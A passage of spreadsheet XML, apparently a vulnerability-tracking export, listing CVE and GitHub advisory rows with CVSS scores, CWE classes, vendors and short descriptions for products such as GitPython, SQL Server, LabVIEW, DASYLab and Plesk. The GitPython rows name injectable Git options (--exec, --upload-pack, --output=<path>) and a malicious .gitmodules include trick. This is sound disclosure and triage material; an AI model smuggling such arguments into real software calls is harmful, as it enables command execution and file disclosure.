s="5" t="inlineStr" /><c r="H555" s="5" t="n"><v>0.004</v></c><c r="I555" s="5" t="inlineStr" /><c r="J555" s="5" t="inlineStr" /><c r="K555" s="5" t="inlineStr" /><c r="L555" s="5" t="inlineStr" /><c r="M555" s="5" t="inlineStr" /><c r="N555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P555" s="5" t="inlineStr" /><c r="Q555" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R555" s="5" t="inlineStr"><is><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is></c><c r="S555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t></is></c></row><row r="556"><c r="A556" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C556" s="5" t="inlineStr"><is><t>CVE-2026-86722</t></is></c><c r="D556" s="5" t="n"><v>8.6</v></c><c r="E556" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F556" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G556" s="5" t="inlineStr" /><c r="H556" s="5" t="n"><v>0.003</v></c><c r="I556" s="5" t="inlineStr" /><c r="J556" s="5" t="inlineStr" /><c r="K556" s="5" t="inlineStr" /><c r="L556" s="5" t="inlineStr" /><c r="M556" s="5" t="inlineStr" /><c r="N556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P556" s="5" t="inlineStr" /><c r="Q556" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R556" s="5" t="inlineStr"><is><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is></c><c r="S556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t></is></c></row><row r="557"><c r="A557" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B557" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C557" s="5" t="inlineStr"><is><t>GHSA-4vpg-pfj8-m33q</t></is></c><c r="D557" s="5" t="n"><v>8.6</v></c><c r="E557" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F557" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G557" s="5" t="inlineStr" /><c r="H557" s="5" t="inlineStr" /><c r="I557" s="5" t="inlineStr" /><c r="J557" s="5" t="inlineStr" /><c r="K557" s="5" t="inlineStr" /><c r="L557" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M557" s="5" t="inlineStr" /><c r="N557" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O557" s="5" t="inlineStr" /><c r="P557" s="5" t="inlineStr" /><c r="Q557" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="R557" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-956x-8gvw-wg5v. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.51 fails to guard against dangerous Git options passed as keyword arguments in Repo.archive() and git.ls_remote(), allowing command injection via options such as --exec/--upload-pack (leading to arbitrary command execution). Additionally, Repo.iter_commits() and Repo.blame() do not check for leading-dash revision arguments, so a revision like --output=&lt;path&gt; can cause Git to open and truncate an arbitrary file. Exploitation requires an application that passes attacker-controlled arguments to these methods.</t></is></c><c r="S557" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-4vpg-pfj8-m33q</t></is></c></row><row r="558"><c r="A558" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B558" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C558" s="5" t="inlineStr"><is><t>GHSA-crmc-f4m7-33fj</t></is></c><c r="D558" s="5" t="n"><v>8.6</v></c><c r="E558" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F558" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G558" s="5" t="inlineStr" /><c r="H558" s="5" t="inlineStr" /><c r="I558" s="5" t="inlineStr" /><c r="J558" s="5" t="inlineStr" /><c r="K558" s="5" t="inlineStr" /><c r="L558" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M558" s="5" t="inlineStr" /><c r="N558" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O558" s="5" t="inlineStr" /><c r="P558" s="5" t="inlineStr" /><c r="Q558" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R558" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-7833-fr7j-v32q. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.</t></is></c><c r="S558" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-crmc-f4m7-33fj</t></is></c></row><row r="559"><c r="A559" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B559" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C559" s="5" t="inlineStr"><is><t>CVE-2026-16233</t></is></c><c r="D559" s="5" t="n"><v>8.5</v></c><c r="E559" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F559" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G559" s="5" t="inlineStr" /><c r="H559" s="5" t="n"><v>0.001</v></c><c r="I559" s="5" t="inlineStr" /><c r="J559" s="5" t="inlineStr" /><c r="K559" s="5" t="inlineStr"><is><t>ni:labview</t></is></c><c r="L559" s="5" t="inlineStr" /><c r="M559" s="5" t="inlineStr" /><c r="N559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O559" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P559" s="5" t="inlineStr" /><c r="Q559" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R559" s="5" t="inlineStr"><is><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is></c><c r="S559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16233</t></is></c></row><row r="560"><c r="A560" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B560" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C560" s="5" t="inlineStr"><is><t>CVE-2026-16234</t></is></c><c r="D560" s="5" t="n"><v>8.5</v></c><c r="E560" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F560" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G560" s="5" t="inlineStr" /><c r="H560" s="5" t="n"><v>0.001</v></c><c r="I560" s="5" t="inlineStr" /><c r="J560" s="5" t="inlineStr" /><c r="K560" s="5" t="inlineStr"><is><t>ni:labview</t></is></c><c r="L560" s="5" t="inlineStr" /><c r="M560" s="5" t="inlineStr" /><c r="N560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O560" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P560" s="5" t="inlineStr" /><c r="Q560" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R560" s="5" t="inlineStr"><is><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is></c><c r="S560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16234</t></is></c></row><row r="561"><c r="A561" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B561" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C561" s="5" t="inlineStr"><is><t>CVE-2026-45221</t></is></c><c r="D561" s="5" t="n"><v>8.5</v></c><c r="E561" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F561" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G561" s="5" t="inlineStr" /><c r="H561" s="5" t="n"><v>0.001</v></c><c r="I561" s="5" t="inlineStr" /><c r="J561" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K561" s="5" t="inlineStr" /><c r="L561" s="5" t="inlineStr" /><c r="M561" s="5" t="inlineStr" /><c r="N561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O561" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P561" s="5" t="inlineStr" /><c r="Q561" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="R561" s="5" t="inlineStr"><is><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is></c><c r="S561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45221</t></is></c></row><row r="562"><c r="A562" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B562" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C562" s="5" t="inlineStr"><is><t>CVE-2026-4644</t></is></c><c r="D562" s="5" t="n"><v>8.5</v></c><c r="E562" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F562" s="5" t="inlineStr"><is><t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t></is></c><c r="G562" s="5" t="inlineStr" /><c r="H562" s="5" t="n"><v>0.002</v></c><c r="I562" s="5" t="inlineStr" /><c r="J562" s="5" t="inlineStr" /><c r="K562" s="5" t="inlineStr" /><c r="L562" s="5" t="inlineStr" /><c r="M562" s="5" t="inlineStr" /><c r="N562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O562" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P562" s="5" t="inlineStr" /><c r="Q562" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R562" s="5" t="inlineStr"><is><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is></c><c r="S562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-4644</t></is></c></row><row r="563"><c r="A563" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C563" s="5" t="inlineStr"><is><t>CVE-2026-58113</t></is></c><c r="D563" s="5" t="n"><v>8.5</v></c><c r="E563" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F563" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G563" s="5" t="inlineStr" /><c r="H563" s="5" t="n"><v>0.002</v></c><c r="I563" s="5" t="inlineStr" /><c r="J563" s="5" t="inlineStr" /><c r="K563" s="5" t="inlineStr" /><c r="L563" s="5" t="inlineStr" /><c r="M563" s="5" t="inlineStr" /><c r="N563" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P563" s="5" t="inlineStr" /><c r="Q563" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R563" s="5" t="inlineStr"><is><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is></c><c r="S563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t></is></c></row><row r="564"><c r="A564" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B564" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C564" s="5" t="inlineStr"><is><t>CVE-2026-61639</t></is></c><c r="D564" s="5" t="n"><v>8.5</v></c><c r="E564" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F564" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G564" s="5" t="inlineStr" /><c r="H564" s="5" t="n"><v>0.003</v></c><c r="I564" s="5" t="inlineStr" /><c r="J564" s="5" t="inlineStr" /><c r="K564" s="5" t="inlineStr" /><c r="L564" s="5" t="inlineStr" /><c r="M564" s="5" t="inlineStr" /><c r="N564" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O564" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P564" s="5" t="inlineStr" /><c r="Q564" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R564" s="5" t="inlineStr"><is><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is></c><c r="S564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61639</t></is></c></row><row r="565"><c r="A565" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B565" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C565" s="5" t="inlineStr"><is><t>CVE-2026-61640</t></is></c><c r="D565" s="5" t="n"><v>8.5</v></c><c r="E565" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F565" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G565" s="5" t="inlineStr" /><c r="H565" s="5" t="n"><v>0.003</v></c><c r="I565" s="5" t="inlineStr" /><c r="J565" s="5" t="inlineStr" /><c r="K565" s="5" t="inlineStr" /><c r="L565" s="5" t="inlineStr" /><c r="M565" s="5" t="inlineStr" /><c r="N565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O565" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P565" s="5" t="inlineStr" /><c r="Q565" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R565" s="5" t="inlineStr"><is><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is></c><c r="S565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61640</t></is></c></row><row r="566"><c r="A566" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B566" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C566" s="5" t="inlineStr"><is><t>CVE-2026-64195</t></is></c><c r="D566" s="5" t="n"><v>8.5</v></c><c r="E566" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F566" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G566" s="5" t="inlineStr" /><c r="H566" s="5" t="n"><v>0.001</v></c><c r="I566" s="5" t="inlineStr" /><c r="J566" s="5" t="inlineStr" /><c r="K566" s="5" t="inlineStr" /><c r="L566" s="5" t="inlineStr" /><c r="M566" s="5" t="inlineStr" /><c r="N566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O566" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P566" s="5" t="inlineStr" /><c r="Q566" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R566" s="5" t="inlineStr"><is><t>There is an out-of-bounds write vulnerability in DASYLab due to lack of proper validation of user-supplied data. Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t></is></c><c r="S566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64195</t></is></c></row><row r="567"><c r="A567" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B567" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C567" s="5" t="inlineStr"><is><t>CVE-2026-64196</t></is></c><c r="D567" s="5" t="n"><v>8.5</v></c><c r="E567" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F567" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G567" s="5" t="inlineStr" /><c r="H567" s="5" t="n"><v>0.001</v></c><c r="I567" s="5" t="inlineStr" /><c r="J567" s="5" t="inlineStr" /><c r="K567" s="5" t="inlineStr" /><c r="L567" s="5" t="inlineStr" /><c r="M567" s="5" t="inlineStr" /><c r="N567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O567" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P567" s="5" t="inlineStr" /><c r="Q567" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R567" s="5" t="inlineStr"><is><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is></c><c r="S567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64196</t></is></c></row><row r="568"><c r="A568" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B568" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C568" s="5" t="inlineStr"><is><t>CVE-2026-64197</t></is></c><c r="D568" s="5" t="n"><v>8.5</v></c><c r="E568" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F568" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G568" s="5" t="inlineStr" /><c r="H568" s="5" t="n"><v>0.001</v></c><c r="I568" s="5" t="inlineStr" /><c r="J568" s="5" t="inlineStr" /><c r="K568" s="5" t="inlineStr" /><c r="L568" s="5" t="inlineStr" /><c r="M568" s="5" t="inlineStr" /><c r="N568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O568" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P568" s="5" t="inlineStr" /><c r="Q568" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R568" s="5" t="inlineStr"><is><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is></c><c r="S568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64197</t></is></c></row><row r="569"><c r="A569" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B569" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C569" s="5" t="inlineStr"><is><t>CVE-2026-64198</t></is></c><c r="D569" s="5" t="n"><v>8.5</v></c><c r="E569" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F569" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G569" s="5" t="inlineStr" /><c r="H569" s="5" t="n"><v>0.001</v></c><c r="I569" s="5" t="inlineStr" /><c r="J569" s="5" t="inlineStr" /><c r="K569" s="5" t="inlineStr" /><c r="L569" s="5" t="inlineStr" /><c r="M569" s="5" t="inlineStr" /><c r="N569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O569" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P569" s="5" t="inlineStr" /><c r="Q569" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R569" s="5" t="inlineStr"><is><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is></c><c r="S569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64198</t></is></c></row><row r="570"><c r="A570" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B570" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C570" s="5" t="inlineStr"><is><t>CVE-2026-64200</t></is></c><c r="D570" s="5" t="n"><v>8.5</v></c><c r="E570" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F570" s="5" t="inlineStr"><is><t>security@ni.com</t></is></c><c r="G570" s="5" t="inlineStr" /><c r="H570" s="5" t="n"><v>0.001</v></c><c r="I570" s="5" t="inlineStr" /><c r="J570" s="5" t="inlineStr" /><c r="K570" s="5" t="inlineStr" /><c r="L570" s="5" t="inlineStr" /><c r="M570" s="5" t="inlineStr" /><c r="N570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O570" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P570" s="5" t="inlineStr" /><c r="Q570" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R570" s="5" t="inlineStr"><is><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is></c><c r="S570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-64200</t></is></c></row><row r="571"><c r="A571" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C571" s="5" t="inlineStr"><is><t>CVE-2026-67378</t></is></c><c r="D571" s="5" t="n"><v>8.5</v></c><c r="E571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F571" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G571" s="5" t="inlineStr" /><c r="H571" s="5" t="n"><v>0.005</v></c><c r="I571" s="5" t="inlineStr" /><c r="J571" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K571" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L571" s="5" t="inlineStr" /><c r="M571" s="5" t="inlineStr" /><c r="N571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P571" s="5" t="inlineStr" /><c r="Q571" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R571" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67378</t></is></c></row><row r="572"><c r="A572" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C572" s="5" t="inlineStr"><is><t>CVE-2026-67379</t></is></c><c r="D572" s="5" t="n"><v>8.5</v></c><c r="E572" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F572" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G572" s="5" t="inlineStr" /><c r="H572" s="5" t="n"><v>0.006</v></c><c r="I572" s="5" t="inlineStr" /><c r="J572" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K572" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L572" s="5" t="inlineStr" /><c r="M572" s="5" t="inlineStr" /><c r="N572" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P572" s="5" t="inlineStr" /><c r="Q572" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R572" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S572" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t></is></c></row><row r="573"><c r="A573" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B573" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C573" s="5" t="inlineStr"><is><t>CVE-2026-67397</t></is></c><c r="D573" s="5" t="n"><v>8.5</v></c><c r="E573" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F573" s="5" t="inlineStr"><is><t>support@hackerone.com</t></is></c><c r="G573" s="5" t="inlineStr" /><c r="H573" s="5" t="n"><v>0.001</v></c><c r="I573" s="5" t="inlineStr" /><c r="J573" s="5" t="inlineStr" /><c r="K573" s="5" t="inlineStr" /><c r="L573" s="5" t="inlineStr" /><c r="M573" s="5" t="inlineStr" /><c r="N573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O573" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P573" s="5" t="inlineStr" /><c r="Q573" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R573" s="5" t="inlineStr"><is><t>Path traversal in Plesk 18.0.79.9 and earlier and 18.0.80 through 18.0.80.5 allows local users to execute arbitrary code as root.</t></is></c><c r="S573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67397</t></is></c></row><row r="574"><c r="A574" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C574" s="5" t="inlineStr"><is><t>CVE-2026-67636</t></is></c><c r="D574" s="5" t="n"><v>8.5</v></c><c r="E574" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G574" s="5" t="inlineStr" /><c r="H574" s="5" t="n"><v>0.005</v></c><c r="I574" s="5" t="inlineStr" /><c r="J574" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K574" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L574" s="5" t="inlineStr" /><c r="M574" s="5" t="inlineStr" /><c r="N574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P574" s="5" t="inlineStr" /><c r="Q574" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R574" s="5" t="inlineStr"><is><t>Out-of-bounds read in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67636</t></is></c></row><row r="575"><c r="A575" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C575" s="5" t="inlineStr"><is><t>CVE-2026-74860</t></is></c><c r="D575" s="5" t="n"><v>8.5</v></c><c r="E575" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F575" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G575" s="5" t="inlineStr" /><c r="H575" s="5" t="n"><v>0.004</v></c><c r="I575" s="5" t="inlineStr" /><c r="J575" s="5" t="inlineStr" /><c r="K575" s="5" t="inlineStr" /><c r="L575" s="5" t="inlineStr" /><c r="M575" s="5" t="inlineStr" /><c r="N575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P575" s="5" t="inlineStr" /><c r="Q575" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="R575" s="5" t="inlineStr"><is><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is></c><c r="S575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t></is></c></row><row r="576"><c r="A576" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B576" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C576" s="5" t="inlineStr"><is><t>CVE-2026-75486</t></is></c><c r="D576" s="5" t="n"><v>8.5</v></c><c r="E576" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F576" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G576" s="5" t="inlineStr" /><c r="H576" s="5" t="n"><v>0.013</v></c><c r="I576" s="5" t="inlineStr" /><c r="J576" s="5" t="inlineStr" /><c r="K576" s="5" t="inlineStr" /><c r="L576" s="5" t="inlineStr" /><c r="M576" s="5" t="inlineStr" /><c r="N576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O576" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P576" s="5" t="inlineStr" /><c r="Q576" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R576" s="5" t="inlineStr"><is><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is></c><c r="S576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75486</t></is></c></row><row r="577"><c r="A577" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C577" s="5" t="inlineStr"><is><t>CVE-2026-75993</t></is></c><c r="D577" s="5" t="n"><v>8.5</v></c><c r="E577" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F577" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G577" s="5" t="inlineStr" /><c r="H577" s="5" t="n"><v>0.004</v></c><c r="I577" s="5" t="inlineStr" /><c r="J577" s="5" t="inlineStr" /><c r="K577" s="5" t="inlineStr" /><c r="L577" s="5" t="inlineStr" /><c r="M577" s="5" t="inlineStr" /><c r="N577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P577" s="5" t="inlineStr" /><c r="Q577" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R577" s="5" t="inlineStr"><is><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is></c><c r="S577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t></is></c></row><row r="578"><c r="A578" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C578" s="5" t="inlineStr"><is><t>CVE-2026-76958</t></is></c><c r="D578" s="5" t="n"><v>8.5</v></c><c r="E578" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F578" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G578" s="5" t="inlineStr" /><c r="H578" s="5" t="n"><v>0.002</v></c><c r="I578" s="5" t="inlineStr" /><c r="J578" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K578" s="5" t="inlineStr" /><c r="L578" s="5" t="inlineStr" /><c r="M578" s="5" t="inlineStr" /><c r="N578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P578" s="5" t="inlineStr" /><c r="Q578" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="R578" s="5" t="inlineStr"><is><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is></c><c r="S578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t></is></c></row><row r="579"><c r="A579" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B579" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C579" s="5" t="inlineStr"><is><t>CVE-2026-80114</t></is></c><c r="D579" s="5" t="n"><v>8.5</v></c><c r="E579" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F579" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G579" s="5" t="inlineStr" /><c r="H579" s="5" t="n"><v>0.001</v></c><c r="I579" s="5" t="inlineStr" /><c r="J579" s="5" t="inlineStr" /><c r="K579" s="5" t="inlineStr" /><c r="L579" s="5" t="inlineStr" /><c r="M579" s="5" t="inlineStr" /><c r="N579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O579" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P579" s="5" t="inlineStr" /><c r="Q579" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="R579" s="5" t="inlineStr"><is><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is></c><c r="S579" s="6" 